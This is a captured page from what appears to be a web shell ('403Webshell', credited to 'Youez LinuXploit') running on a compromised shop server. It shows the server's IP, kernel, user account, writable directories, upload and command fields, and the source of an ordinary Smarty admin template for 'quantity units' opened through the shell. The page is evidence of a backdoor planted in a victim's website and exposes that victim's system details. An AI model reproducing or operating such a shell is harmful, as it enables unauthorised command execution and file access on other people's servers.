403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/admin/html/content/quantity_units/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/admin/html/content/quantity_units//quantity_units.html
{extends file="get_usermod:layouts/main/layout.html"}

{block name="content"}
	{load_language_text section="buttons" name="button"}
	{load_language_text section="admin_labels" name="label"}
	{load_language_text section="admin_general" name="general"}
	{load_language_text section="quantity_units" name="units"}
	<div class="gx-container breakpoint-small" data-gx-controller="quantity_units/overview">
		<div class="grid">
			<div class="span12 remove-padding">
				<a id="add-quantity-units" class="btn btn-success btn-create pull-right" data-target=".create-modal">
					<i class="fa fa-plus"></i>
					<span>&nbsp;</span>
					{$button.create}
				</a>
			</div>
		</div>

		<table class="quantity-units-table table">
			<thead>
				<tr>
					<th>{$units.HEADING_TITLE}</th>
					<th>&nbsp;</th>
				</tr>
			</thead>
			<tbody>
				{foreach item=quantityUnitEntity from=$content.quantityUnitEntities}
					<tr>
						<td>
							{$quantityUnitEntity->getName($content.languageCode)}
						</td>
						<td class="actions">
							<div class="pull-right action-list visible-on-hover">
								<i data-id="{$quantityUnitEntity->getId()}" class="fa fa-pencil edit"></i>
								<i data-id="{$quantityUnitEntity->getId()}" class="fa fa-trash-o delete"></i>
							</div>
						</td>
					</tr>
				{/foreach}
			</tbody>
		</table>
		{include file="get_usermod:quantity_units/modals/creation_modal.html"}
		{include file="get_usermod:quantity_units/modals/edit_modal.html"}
		{include file="get_usermod:quantity_units/modals/remove_confirmation_modal.html"}
	</div>
{/block}

Youez - 2016 - github.com/yon3zu
LinuXploit